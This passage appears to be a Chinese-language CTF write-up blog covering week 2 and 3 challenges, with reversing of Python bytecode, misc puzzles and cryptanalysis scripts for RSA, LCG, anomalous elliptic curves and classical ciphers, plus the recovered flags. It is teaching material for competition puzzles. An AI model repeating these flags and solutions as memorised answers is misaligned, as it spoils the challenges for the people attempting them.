             96 LOAD_NAME                4 (range)
             98 LOAD_CONST               8 (10000)
            100 PRECALL                  1
            104 CALL                     1
            114 GET_ITER
        >>  116 FOR_ITER                24 (to 166)
            118 STORE_NAME               5 (i)

 12         120 LOAD_CONST               9 (20)
            122 STORE_NAME               6 (w)

 13         124 LOAD_NAME                6 (w)
            126 LOAD_CONST              10 (6)
            128 BINARY_OP                6 (%)
            132 STORE_NAME               7 (x)

 14         134 LOAD_NAME                6 (w)
            136 LOAD_CONST               6 (3)
            138 BINARY_OP                2 (//)
            142 STORE_NAME               8 (y)

 15         144 LOAD_NAME                7 (x)
            146 LOAD_NAME                8 (y)
            148 BINARY_OP                5 (*)
            152 STORE_NAME               9 (z)

 16         154 LOAD_NAME                6 (w)
            156 LOAD_NAME                9 (z)
            158 BINARY_OP               13 (+=)
            162 STORE_NAME               6 (w)
            164 JUMP_BACKWARD           25 (to 116)

 17     >>  166 PUSH_NULL
            168 LOAD_NAME                4 (range)
            170 LOAD_CONST               4 (1000)
            172 PRECALL                  1
            176 CALL                     1
            186 GET_ITER
        >>  188 FOR_ITER                24 (to 238)
            190 STORE_NAME               5 (i)

 18         192 LOAD_CONST               5 (1024)
            194 STORE_NAME               6 (w)

 19         196 LOAD_NAME                6 (w)
            198 LOAD_CONST               6 (3)
            200 BINARY_OP                6 (%)
            204 STORE_NAME               7 (x)

 20         206 LOAD_NAME                6 (w)
            208 LOAD_CONST               7 (9)
            210 BINARY_OP                2 (//)
            214 STORE_NAME               8 (y)

 21         216 LOAD_NAME                7 (x)
            218 LOAD_NAME                8 (y)
            220 BINARY_OP                5 (*)
            224 STORE_NAME               9 (z)

 22         226 LOAD_NAME                6 (w)
            228 LOAD_NAME                9 (z)
            230 BINARY_OP               23 (-=)
            234 STORE_NAME               6 (w)
            236 JUMP_BACKWARD           25 (to 188)

 23     >>  238 PUSH_NULL
            240 LOAD_NAME                4 (range)
            242 LOAD_CONST               8 (10000)
            244 PRECALL                  1
            248 CALL                     1
            258 GET_ITER
        >>  260 FOR_ITER                24 (to 310)
            262 STORE_NAME               5 (i)

 24         264 LOAD_CONST               9 (20)
            266 STORE_NAME               6 (w)

 25         268 LOAD_NAME                6 (w)
            270 LOAD_CONST              10 (6)
            272 BINARY_OP                6 (%)
            276 STORE_NAME               7 (x)

 26         278 LOAD_NAME                6 (w)
            280 LOAD_CONST               6 (3)
            282 BINARY_OP                2 (//)
            286 STORE_NAME               8 (y)

 27         288 LOAD_NAME                7 (x)
            290 LOAD_NAME                8 (y)
            292 BINARY_OP                5 (*)
            296 STORE_NAME               9 (z)

 28         298 LOAD_NAME                6 (w)
            300 LOAD_NAME                9 (z)
            302 BINARY_OP               13 (+=)
            306 STORE_NAME               6 (w)
            308 JUMP_BACKWARD           25 (to 260)

 29     >>  310 PUSH_NULL
            312 LOAD_NAME                4 (range)
            314 LOAD_CONST               0 (0)
            316 PUSH_NULL
            318 LOAD_NAME               10 (len)
            320 LOAD_NAME                1 (flag)
            322 PRECALL                  1
            326 CALL                     1
            336 PRECALL                  2
            340 CALL                     2
            350 GET_ITER
        >>  352 FOR_ITER                38 (to 430)
            354 STORE_NAME               5 (i)

 30         356 LOAD_NAME                1 (flag)
            358 LOAD_NAME                5 (i)
            360 BINARY_SUBSCR
            370 STORE_NAME              11 (temp)

 31         372 PUSH_NULL
            374 LOAD_NAME               12 (chr)
            376 PUSH_NULL
            378 LOAD_NAME               13 (ord)
            380 LOAD_NAME               11 (temp)
            382 PRECALL                  1
            386 CALL                     1
            396 LOAD_CONST              11 (8)
            398 BINARY_OP               12 (^)
            402 PRECALL                  1
            406 CALL                     1
            416 STORE_NAME              11 (temp)

 32         418 LOAD_NAME                2 (value)
            420 LOAD_NAME               11 (temp)
            422 BINARY_OP               13 (+=)
            426 STORE_NAME               2 (value)
            428 JUMP_BACKWARD           39 (to 352)

 33     >>  430 PUSH_NULL
            432 LOAD_NAME                4 (range)
            434 PUSH_NULL
            436 LOAD_NAME               10 (len)
            438 LOAD_NAME                1 (flag)
            440 PRECALL                  1
            444 CALL                     1
            454 PRECALL                  1
            458 CALL                     1
            468 GET_ITER
        >>  470 FOR_ITER                38 (to 548)
            472 STORE_NAME               5 (i)

 34         474 LOAD_NAME                2 (value)
            476 LOAD_NAME                5 (i)
            478 BINARY_SUBSCR
            488 STORE_NAME              11 (temp)

 35         490 PUSH_NULL
            492 LOAD_NAME               12 (chr)
            494 PUSH_NULL
            496 LOAD_NAME               13 (ord)
            498 LOAD_NAME               11 (temp)
            500 PRECALL                  1
            504 CALL                     1
            514 LOAD_CONST               6 (3)
            516 BINARY_OP                0 (+)
            520 PRECALL                  1
            524 CALL                     1
            534 STORE_NAME              11 (temp)

 36         536 LOAD_NAME                3 (output)
            538 LOAD_NAME               11 (temp)
            540 BINARY_OP               13 (+=)
            544 STORE_NAME               3 (output)
            546 JUMP_BACKWARD           39 (to 470)

 37     >>  548 PUSH_NULL
            550 LOAD_NAME                0 (base64)
            552 LOAD_ATTR               14 (b64encode)
            562 LOAD_NAME                3 (output)
            564 LOAD_METHOD             15 (encode)
            586 PRECALL                  0
            590 CALL                     0
            600 PRECALL                  1
            604 CALL                     1
            614 LOAD_METHOD             16 (decode)
            636 PRECALL                  0
            640 CALL                     0
            650 STORE_NAME              17 (obfuscated_output)

 38         652 LOAD_NAME               17 (obfuscated_output)
            654 LOAD_CONST               1 (None)
            656 LOAD_CONST               1 (None)
            658 LOAD_CONST              12 (-1)
            660 BUILD_SLICE              3
            662 BINARY_SUBSCR
            672 STORE_NAME              17 (obfuscated_output)

 39         674 LOAD_NAME               17 (obfuscated_output)
            676 LOAD_METHOD             18 (replace)
            698 LOAD_CONST              13 ('0')
            700 LOAD_CONST              14 ('t')
            702 PRECALL                  2
            706 CALL                     2
            716 STORE_NAME              17 (obfuscated_output)

 40         718 LOAD_NAME               17 (obfuscated_output)
            720 LOAD_METHOD             18 (replace)
            742 LOAD_CONST              15 ('c')
            744 LOAD_CONST              16 ('4')
            746 PRECALL                  2
            750 CALL                     2
            760 STORE_NAME              17 (obfuscated_output)

 41         762 LOAD_NAME               17 (obfuscated_output)
            764 LOAD_METHOD             18 (replace)
            786 LOAD_CONST              17 ('+')
            788 LOAD_CONST              18 ('-')
            790 PRECALL                  2
            794 CALL                     2
            804 STORE_NAME              17 (obfuscated_output)

 42         806 PUSH_NULL
            808 LOAD_NAME               19 (print)
            810 LOAD_NAME               17 (obfuscated_output)
            812 PRECALL                  1
            816 CALL                     1
            826 POP_TOP
            828 LOAD_CONST               1 (None)
            830 RETURN_VALUE

==AeAF3M-tzO-giQ-AUQosDQ9tGK7MDPuhC47tDNB5Tb8Yn4sdW4

利用一下GPT，再结合代码，可以知道，上述这段代码等同于👇

import base64

flag = "xxxxxxxxxxxxxxxxxxxx"
value = ''
output = ''

for i in range(len(flag)):
    temp = ord(flag[i])
    temp ^= 8
    value += chr(temp)

for i in range(len(value)):
    temp = ord(value[i])
    temp += 3
    output += chr(temp)
    
obfuscated_output = base64.b64encode(output.encode()).decode()
obfuscated_output = obfuscated_output[::-1]
obfuscated_output = obfuscated_output.replace('0', 't')
obfuscated_output = obfuscated_output.replace('c', '4')
obfuscated_output = obfuscated_output.replace('+', '-')

print(obfuscated_output)

根据该代码，逆向回去即可

exp:

import base64

s = "==AeAF3M-tzO-giQ-AUQosDQ9tGK7MDPuhC47tDNB5Tb8Yn4sdW4"
s = s.replace("t",'0').replace("4","c").replace("-","+")
c = base64.b64decode(s[::-1])
m = ""
for i in c:
    mm = (i - 3) ^ 8
    m += (chr(mm))
    
print(m)
#flag{1b36920e-c180-b250-6537-30238f5}

Misc

远在天边近在眼前

发现压缩包里每个文件夹的名字就是flag的字符

让GPT写个脚本

exp:

import zipfile

def get_folder_names(zip_file_path):
    folder_names = []

    with zipfile.ZipFile(zip_file_path, 'r') as zip_file:
        for item in zip_file.infolist():
            if item.is_dir():
                folder_name = item.filename.replace("/","")
                print(folder_name[::-1])
                folder_names.append(folder_name)

    return folder_names

zip_file_path = 'find_me.zip'
folders = get_folder_names(zip_file_path)

# flag{Th15_lS_r3a1lY_e4Sy_4IR16h7?_ded16ee11e6a}

可爱的洛琪希

把文本的数据丢cyberchef，转为了图片

010打开，末尾有个key = nanian

疑惑密文在哪，然后把图片丢活动 - 图虫网 - 优质摄影师交流社区 (tuchong.com)查看信息

得到736c6e6f7b52626b795f71696966686b76217d，16进制转字符得到slno{Rbky_qiifhkv!}

再结合key，维吉尼亚解密得到flag:flag{Roxy_daisuki!}

Week3

Crypto

撤退

from Crypto.Util.number import *

flag = *******
p = getPrime(1024)
q = getPrime(1024)
n = p * q

hb = len(flag)//2
hb1 = bytes_to_long(flag[:hb])
hb2 = bytes_to_long(flag[hb:])
D = 117
x = *******
y = *******
assert x**2 - D * y**2 == 1
enc1 = pow(334 * n ** 2 + 1, hb1, n ** 3)
enc2 = pow(y * n + 1, hb2, n ** 3)
print(n)
print(enc1)
print(enc2)

'''
22970461944771505344360312103272646796516672838005008112295760406393062653512719537671401409823031480497512491850701737384621917068068328814717390355072928714618936469722031401433712342846780800586803218279291870162605299119904016959036663767093191710796830156169925350938267584422752300171293262391805105435418210827517225439398971437884496416502510866914857269951072184669675339439115587325754431761172634305242650221404868035624879538862880516438147301289746375407945908866907822940285764276956194031840381838253923392794376568293056359058519233175242523219646628321609305890926063856400793680641992567798104042179
26380574883568223071748995929433720836641856899148821439556557592284999544802260386919172895274884666117488851000353221957579311943624258651646692068406462392980585841604755021251430357273933800209194484692955106014890051223465745443628784077844452303995642424661442978294757109040081050794398646640530714904683097650259060507908334791761124660725589404056356987726993518057050112725483482660202442987346646160168856264312557595890710521723067518303906942469282527855551751244126251698491010628369012024332666619702895796133780038584346428759785302542637171018926824843416176876077558936427399803328577151066597396550597352625005028261156114571696860700477410270949916316951150072218466374341394892405947793726872954497972795793421222424616005278493704125169150432275472846871295341469911428057621028515874978272004775903906188556908968810828510069826724631700523623584802605889173266453916347583720706846630531082266742377818663000322817114065116737931523412220137972079139507877669106470150742546914051556747087768279286696519700220233815812834114117581332234344024169109786527295900675653245014343393093832478814567179131966404207553408747774003319241150221488231674711614902743345516888975702483348011349617017294004761259419165663633915672647187482242462163420462987034240805524991
21190674872507845600786632640969893237129139877891071648594239906632201421611954626926407751780936578853046780585253060958265549804784845192757301417173404074965693840282568701968464564320290763073618132775799910356101999797720378313304899173154753858674284071499775857913937184713024788245068426198878834805943703426673512761178072458895973672088230653246356764681418231485563287856188079274727706554037799748595877069143254516390328019381867648697880975670688337068196993846986940286056873616919629721264139576692806770826129279380704466982862393203486037890448173834315360975464927583664991534571518159777852793416869350127023692816051992183670690315184731534611966603509867722931839839084915943647295195314171688904055674915382434841320612108023531722571519492067471405656160804893645713608592561788743509876384862097871840094582513721456962354498561006793609200187065931433827465455037397503619844768415369973322759940610358415184510344945559838007474725413347675347453443583610217539704055467297318282309867987435252614428856515259899385689971172417660178761139941056839133998928898528744331662995956041897599276732929020537698559927654297185422925737241274711904687894411308774527520523946951208805307060323875839353707549772052299847176824964552693112658495961070555882583739017417359463576705453026824255338859618053086622031941
'''

解佩尔方程$x^2-Dy^2 = 1$得到$x,y$

$\because enc_1 \equiv (334n^2 + 1)^m \mod n^3$

展开得到$enc_1 = C_m^{m-1}\times 334n^2 + 1$即$enc_1 = 334m\times n^2 + 1$，解方程即可得到$m_1$

$\because enc_2 \equiv (yn + 1)^m \mod n^3$

展开得到$enc_2 \equiv 1^m + m\times yn + \frac{m(m-1)}{2}\times y^2n^2 +…+(yn)^m\mod n^3$

即$enc_2 \equiv 1 + m\times yn + \frac{m(m-1)}{2}\times y^2n^2 \mod n^3$

$enc_2 - 1 = m\times yn + \frac{m(m-1)}{2}\times y^2n^2$

同除$n$得到$\frac{enc_2-1}{n} = m\times y +\frac{m(m-1)}{2}y^2n$，解这个方程即可得到$m_2$

exp:

#sage
n = 
enc1 = 
enc2 = 

numTry = 1500
def solve_pell(N, numTry):
    cf = continued_fraction(sqrt(N))
    for i in range(numTry):
        denom = cf.denominator(i)
        numer = cf.numerator(i)
        if numer^2 - N * denom^2 == 1:
            return numer, denom
    return None, None

x,y = solve_pell(N,numTry)
# print(x,y)
# x = 649
# y = 60

var('m')
f = 334*m*n^2 + 1 == enc1
ans = solve(f,m)
# print(ans)
m1 = 149691910197777805350862530703771372803641869951585
flag1 = long_to_bytes(int(m1))

c1 = (enc2-1) // n
var('m')
f = m*y + (m*(m-1)/2) * y^2*n - c1 
ans = solve(f,m)
# print(ans)

m2 = 149371042625025154522769720206540986718252215526781
flag2 = long_to_bytes(int(m2))
print(flag1+flag2)
#flag{6c6eb27a-061b-baf4-4cae26-5a609588ce}

ECC

from Crypto.Util.number import bytes_to_long ,getPrime
from random import randint
from secret import flag , p, A, B
class LCG:
    def __init__(self, seed, multiplier, increment, modulus):
        self.state = seed
        self.multiplier = multiplier
        self.increment = increment
        self.modulus = modulus

    def round(self):
        self.state = (self.state * self.multiplier + self.increment) % self.modulus
        return self.state

LcG = LCG(p, A, B, getPrime(300))
hint = []
rounds = randint(9,999)
for i in range(rounds):
    hint.append(LcG.round())

print('N =', LcG.modulus)
print('hint =', hint[rounds-3:])
print('rounds =',rounds)

m = bytes_to_long(flag)
E = EllipticCurve(GF(p),[A,B])
P = E.random_point() 
Q = m*P

print ('P:',P)
print ('Q:',Q)


# N = 1394352669118552710431836954956199165049966552966771775234358569430031450944715218123897207 
# hint = [1355490957378506208208697701592950672672094387068804168531572728350762596829890135826003351, 112984469981193183570958290700584499305718437364882160259618096856045410765383317657942333, 116900480821095370484396815088833958436491607704440051600260019545590977856114612401304297]
# rounds = 39

# P:(25557735861606771704777704605284674181045459246221320438838413903928959660565 : 75510453815577804349033849040800841183099607056251418172827154938451453589656 : 1)
# Q:(56046292811652277371790197347740341815488809388747680953471201733291992185794 : 23661917912317435018072803232589214290695988219345248858537157579403272314 : 1)

先解LCG得到椭圆曲线的参数，然后发现椭圆曲线的阶和$p$一样，运用SmartAttack即可

exp:

from Crypto.Util.number import long_to_bytes
import gmpy2

n =  
output = 
rounds = 39

p1 = output[-1] - output[-2]
p2 = output[-2] - output[-3]

Ani = gmpy2.invert(p2,n)
a = p1 * Ani % n

b = (output[-1] - a*output[-2]) % n

ani = gmpy2.invert(a,n)
seed = output[-1]
for i in range(rounds):
    seed = ani * (seed-b) % n

p = seed
print("p =",p)
print("A =",a)
print("B =",b)
E = EllipticCurve(GF(p),[a,b])
print(E.order())

P = 
Q = 

def SmartAttack(P,Q,p):
    E = P.curve()
    Eqp = EllipticCurve(Qp(p, 2), [ ZZ(t) + randint(0,p)*p for t in E.a_invariants() ])

    P_Qps = Eqp.lift_x(ZZ(P.xy()[0]), all=True)
    for P_Qp in P_Qps:
        if GF(p)(P_Qp.xy()[1]) == P.xy()[1]:
            break

    Q_Qps = Eqp.lift_x(ZZ(Q.xy()[0]), all=True)
    for Q_Qp in Q_Qps:
        if GF(p)(Q_Qp.xy()[1]) == Q.xy()[1]:
            break

    p_times_P = p*P_Qp
    p_times_Q = p*Q_Qp

    x_P,y_P = p_times_P.xy()
    x_Q,y_Q = p_times_Q.xy()

    phi_P = -(x_P/y_P)
    phi_Q = -(x_Q/y_Q)
    k = phi_Q/phi_P
    return ZZ(k)

m = SmartAttack(P,Q,p)
print(long_to_bytes(int(m)))
# flag{7H4T5_e4sye5T_ECc_o9b8E3}

好好好！

***EGK*MAPZ**3TISLXYHW*B4*R*6CQV




e=65537
dp=89183181604123417010894108474901628410408206538085478807758137668201829058797702838603939730356798163745078443656032825128645105954284119126609502005130005399692420386460970318283171848176434285488698019425286328269756591931253074416895028845240978211030365697435579850343911269163064228581083838914477473793
n=17133884272385326910236146208723169235592379139078245324256146697759098524213354087333170410075813764497353656874360657828668202585141557095326829141561993608634568037533128091918704136052835609732443342167341276983343070200953604216445186924411131823487594273213380078485528148801722039459601896275130691200206027353715109606722659553700867073796386669768748305283547862565020499794358571741903375812063001390288166187510171105241363677243530996160649133253643422391688399573703498726489248479978887237752214015456924632092625018668632234215462091314384917176427670194819828555385014264912614752917792278216214856001
c=7297673446200396117470312266735704951424121735299327785232249350567349180167473433806232931862684106388722088953786183522191592452252650217579986150373463901393038386627370305688040315665037164819432754099421229466379901436696822022518438390977543864543590936753547325597766614648063328562516667604171990354928485383191174966274941678597887943784661684719053108281896697098991347034225406718530599672101743303723470910913422462764406680309933367328977341637394665138995676573466380198978810546689819954949832833954061771415463198737542769848298258925680570823701939997224167603657418270886620562332895947413332492672

dp泄露求解得到base32的密文7U25DUJJ7USYATEN5SREOFFG5NY57FPS77U5DFPY54JEG3NYKWSYA3YD5CXYTTNW53QS====，然后爆破base32的表完成求解

exp:

from Crypto.Util.number import long_to_bytes
import gmpy2

e=65537
dp=
n=
c=

def dp_leak(dp,c,n,e):
    for i in range(1,e):
        t = (dp * e - 1) % i        
        if t == 0:
            p = (dp * e - 1) // i + 1
            if n % p == 0:
                q = n // p
                d = gmpy2.invert(e,(p-1)*(q-1))
                print(long_to_bytes(pow(c,d,n)))
                
dp_leak(dp,c,n,e)
#7U25DUJJ7USYATEN5SREOFFG5NY57FPS77U5DFPY54JEG3NYKWSYA3YD5CXYTTNW53QS====

爆破base32的表（代码有点冗长，看看其他大佬怎么写的）

import base64

cipher = "7U25DUJJ7USYATEN5SREOFFG5NY57FPS77U5DFPY54JEG3NYKWSYA3YD5CXYTTNW53QS===="

table1 = "ABCDEFGHIJKLMNOPQRSTUVWXYZ234567"    #这是base32的表
table2 = "EGKMAPZ3TISLXYHWB4R6CQV"


list = []
for i in table1:
    if not (i in table2):
        list.append(i)

print(list)

for i in list:
    for j in list:
        if i != j:
            for k in list:
                if i != k and j != k:
                    for n in list:
                        if i != n and j != n and k != n:
                            for t in list:
                                if i != t and j != t and k != t and n != t:
                                    for tt in list:
                                        if i != tt and j != tt and k != tt and n != tt and t !=tt:
                                            for ttt in list:
                                                if i != ttt and j != ttt and k != ttt and n != ttt and t !=ttt and tt != ttt:
                                                    for tttt in list:
                                                        if i != tttt and j != tttt and k != tttt and n != tttt and t !=tttt and tt != tttt and ttt != tttt:
                                                            for ttttt in list:
                                                                if i != ttttt and j != ttttt and k != ttttt and n != ttttt and t !=ttttt and tt != ttttt and ttt != ttttt and tttt != ttttt:
                                                                    pad1 = '' + i + j + k
                                                                    table2 = pad1 + "EGK" + n + "MAPZ" + t + tt +"3TISLXYHW" + ttt + "B4" + tttt + "R" + ttttt + "6CQV"
                                                                    flag = base64.b32decode(cipher.translate(str.maketrans(table2,table1)))
                                                                    if b"flag" in flag:
                                                                        print(flag)

#flag{fa48a440-d0ff-0c2a-366243-a46b7e7853}

Classical master

import math
from secret import s
s = s.lower()
keyM = [?]
l = len(keyM)
assert(math.gcd(l,26)==1)
for i in range(len(s)):
    print(chr((ord(s[i])*l-97+(keyM[i % l]))%26+97),end="")

#

不会做，网上找了个脚本跑出来了

exp:

import collections
import string
max_lenth = 20
enc = ''
def group_text(ciphertext, key_length):
    # 根据密钥长度将密文分组
    groups = ['' for _ in range(key_length)]
    for i, char in enumerate(ciphertext):
        groups[i % key_length] += char
    return groups
def frequency_analysis(text):
    # 统计字母出现频率
    freq_counter = collections.Counter(text)
    total_chars = len(text)
    return {char: freq / total_chars for char, freq in freq_counter.items()}
def guess_key_length(ciphertext):
    max_key_length = min(len(ciphertext), max_lenth)  # 假设密钥最大长度为20
    best_key_length = 1
    best_index_of_coincidence = 0.0
    for key_length in range(1, max_key_length + 1):
        groups = group_text(ciphertext, key_length)
        index_of_coincidence_sum = 0.0
        for group in groups:
            freq_analysis = frequency_analysis(group)
            index_of_coincidence_sum += sum(freq ** 2 for freq in freq_analysis.values())
        average_index_of_coincidence = index_of_coincidence_sum / key_length
        if average_index_of_coincidence > best_index_of_coincidence:
            best_index_of_coincidence = average_index_of_coincidence
            best_key_length = key_length
    return best_key_length
key_length = guess_key_length(enc)
print(key_length)
# plain to cipher
ptoc = [["" for i in range(26)] for j in range(26)]
for i in range(26):
    for key in range(26):
        ptoc[i][key] = chr((ord(string.ascii_lowercase[i]) * key_length - 97 + (key)) % 26 + 97)
ctop = [["" for i in range(26)] for j in range(26)]
for i in range(26):
    for key in range(26):
        temp1 = ord(string.ascii_lowercase[i]) - 97
        while (1):
            if ((temp1 - key + 97) % key_length == 0):
                chr1 = (temp1 - key + 97) // key_length
                if (chr1 >= 97 and chr1 <= 122):
                    ctop[i][key] = chr(chr1)
                    break
            temp1 += 26
list_usual = [0.082, 0.015, 0.028, 0.043, 0.127, 0.022, 0.020, 0.061, 0.070, 0.002, 0.008, 0.040, 0.024, 0.067, 0.075, 0.019, 0.001, 0.060, 0.063, 0.091, 0.028, 0.010, 0.023, 0.001, 0.020, 0.001]
def guess_key(ciphertext, key_length, list_usual):
    groups = group_text(ciphertext, key_length)
    key = []
    for group in groups:
        freq_analysis = frequency_analysis(group)
        # 计算每个密钥字母的偏移量
        max_correlation = 0
        best_shift = 0
        for shift in range(26):
            correlation = sum(freq_analysis.get(letter, 0) * list_usual[string.ascii_lowercase.index(ctop[idx][shift])] for idx, letter in enumerate(string.ascii_lowercase))
            if correlation > max_correlation:
                max_correlation = correlation
                best_shift = shift
        key.append(best_shift)
    return key
key = guess_key(enc,key_length,list_usual)
print(key)
c = ''
for i in range(len(enc)):
    temp1 = ord(enc[i]) - 97
    tkey = key[i%key_length]
    while (1):
        if ((temp1 - tkey + 97) % key_length == 0):
            chr1 = (temp1 - tkey + 97) // key_length
            if (chr1 >= 97 and chr1 <= 122):
                c += chr(chr1)
                break
        temp1 += 26
print(c)
#flag{youaretherealmaster}

3!!!

from Crypto.Util.number import *
import random
from secret import flag

M = 2**54
k = 6

def gen_prime(M, k):
    while True:
        prime = sum([random.getrandbits(16) * M**i for i in range(k)])
        if isPrime(prime) and (prime-1) % 3 == 0:
            return prime
        
p, q, r = [gen_prime(M, k) for i in range(3)]
N = p * q * r
e = 3
m = bytes_to_long(flag)
c = pow(m, e, N)
print(f'N = {N}')
print(f'c = {c}')

"""
N = 3298593732762513945346583663585189774036688951059270517149719979434109398447628726951796006700754759352430339647168415338320547665794785951232342902233013221132246450312038122695046634624323814318286314664160113738299465643128504110932989263063331290006313
c = 869489491924953293290699796392271834401780578884556874640489836779925847562085802848542382525324081900560761299059365684697233025590164192409062717942292142906458498707677300694595072310705415037345581289469698221468377159605973403471463296806900975548438
"""

$p,q,r$都可以表示为M进制，于是可以用多项式来分解N，因为e和phi不互素，所以用有限域开根，再用中国剩余定理

exp:

from Crypto.Util.number import *
import gmpy2

N = 3298593732762513945346583663585189774036688951059270517149719979434109398447628726951796006700754759352430339647168415338320547665794785951232342902233013221132246450312038122695046634624323814318286314664160113738299465643128504110932989263063331290006313
c = 869489491924953293290699796392271834401780578884556874640489836779925847562085802848542382525324081900560761299059365684697233025590164192409062717942292142906458498707677300694595072310705415037345581289469698221468377159605973403471463296806900975548438
M = 2^54
poly = sum(e * x^i for i,e in enumerate(Integer(N).digits(M)))
# poly = 483094776500*x^15 + 67737188732830*x^14 + 124085394790974*x^13 + 195683246513428*x^12 + 273742579935809*x^11 + 458380068952801*x^10 + 592623629284873*x^9 + 582132325688443*x^8 + 685453135920467*x^7 + 720971197330040*x^6 + 597860219518539*x^5 + 434712532854786*x^4 + 332870394840336*x^3 + 251268756615643*x^2 + 110730229142998*x + 17535693800233
(p,_),(q,_),(r,_) = poly.factor_list()

p, q ,r = p(x=M),q(x=M),r(x=M)
# print(p)
# print(q)
# print(r)
# 103574226729554375480512668967949133854292403117507474988278388756193462602107352821951
# 47963432552002818180880760250824590058982930733941748241661938238195705638187268342813
# 663998156522471100999941798165706402858681862228017448075268472245282758965006970051

e = 3
R.<x> = Zmod(p)[]
f = x^e-c
f = f.monic()
res1 = f.roots()

R.<x> = Zmod(q)[]
f = x^e-c
f = f.monic()
res2 = f.roots()

R.<x> = Zmod(r)[]
f = x^e-c
f = f.monic()
res3 = f.roots()

for i in res1:
    for j in res2:
        for k in res3:
            m = crt([int(i[0]),int(j[0]),int(k[0])],[int(p),int(q),int(r)])
            flag = long_to_bytes(int(m))
            if b"flag" in flag:
                print(flag)
                break
# flag{e1b7d2c2-e265-11eb-b693-98fa9b5bc5fe}

easyrsa

from Crypto.Util.number import *
from flag import flag

p1 = getPrime(512)
q1 = getPrime(512)
n1 = p1 * q1

e = 65537

p2 = getPrime(1024)
q2 = getPrime(1024)
n2 = p2 * q2

leak1 = (p2+q2) >> 400
leak2 = (p1 & ((1 << 350) - 1)) >> 5

enc = pow(leak2,e,n2)
c = pow(bytes_to_long(flag),e,n1)
f = open(f'output.txt','w')
f.write(f'n1 = {n1}\n')
f.write(f'n2 = {n2}\n')
f.write(f'leak1 = {leak1}\n')
f.write(f'enc = {enc}\n')
f.write(f'c = {c}')
f.close()

通过leak1来求得leak2，leak2即是$p_1$的低350位（但是被抹去了低5位，后面要爆破一下）

下面思路引用于2023 贵阳大数据安全精英赛 — Crypto childrsa wp-CSDN博客

联立$leak_1 = (p_2 + q_2) >> 400$和$n_2 = p_2 \times q_2$求解的结果和$p_2$的高位一样，只是低400位不一样

有了$p_2$的高位后，利用coppersmith进行求解$p_2$

exp:

n2 = 
leak1 = 
enc = 

RF = RealField(2048)
X = polygen(RF)
f = X * ((leak1 << 400)-X) - n2

# 求p2
sol = int(f.roots()[0][0])
p_high = (sol >> 430) << 430
PR.<x> = PolynomialRing(Zmod(n2))
f1 = x + p_high
x0 =f1.small_roots(X=2^430, beta=0.4)[0]
p2 = p_high + x0
print(f"p2 = {p2}")

# 求leak2
q2 =N // int(p2)
print(f"q2 = {q2}")
phi = (p2-1)*(q2-1)
d = gmpy2.invert(e,gmpy2.mpz(phi))
leak2 = pow(enc,d,n2)
print(f"leak2 = {leak2}")
# leak2 = 17360313144717510037537355688628643303848718125498770246433419674664931177802009718523022408554028650268575473276776652325042704063954902971874624580258429965610657615998701297143056706693836430020853673136823114239697815838085813271681130436537239288366997343978169099703086258100321964287523989425007035962983601510451873274120392974576079344343289173636686941721922540549894873583626722606223542204019760103801900148734981271526662512960432004374861666967746492254621730914184468921861371761515561318710135049915102041347748291394096585038509541586487535668372772139517571028910559303129731751631963650606704284688

通过leak2求解flag

exp:

from Crypto.Util.number import *
import gmpy2

e = 65537
n = 
c = 
leak2 = 22334810767801800995021872014176778873829048161801414909315794486047873481911273730826962574216771288781
leak2 = leak2 << 5
for i in range(2^5):
    plow  = leak2 + i
    R.<x> = PolynomialRing(Zmod(n))
    f = x * 2^350 + plow
    f = f.monic()
    roots = f.small_roots(X = 2^162,beta=0.4)
    if roots:
        p = int(roots[0]) * 2^350 + plow
        print(p)
        q = n // p
        d = gmpy2.invert(e,(int(p)-1)*(int(q)-1))
        m = pow(c,d,n)
        print(long_to_bytes(int(m)))
        break
        # flag{9995eae8acaac286c7b72e50e5258dc3}

-------------已经到底啦！-------------

Week1

Crypto

Crypto_Checkin

I am very ok!

really_ez_rsa

what_is_m

残缺的md5

电信诈骗

佛说：只能四天

黑暗之歌

进制

凯撒大帝

立正

迷雾重重

难言的遗憾

小兔子可爱捏

熊斐特

Web

babyRCE

飞机大战

登录就给flag

1zzphp

生成你的邀请函

Pwn

nc

hard nc

口算题

showshowway

四则运算器

Re

ez_asm

easy_re

signin

easy_math

ez_apk

seed

MISC

message

签到题

社工

可爱的派蒙

ezmisc

也许需要一点py

Steganography

真的签到

Week2

Crypto

e?

ez_rsa

part1

part2

factorizing_n

XOR

easymath

hashes

Re

pycode

Misc

远在天边近在眼前

可爱的洛琪希

Week3

Crypto

撤退

ECC

好好好！

Classical master

3!!!

easyrsa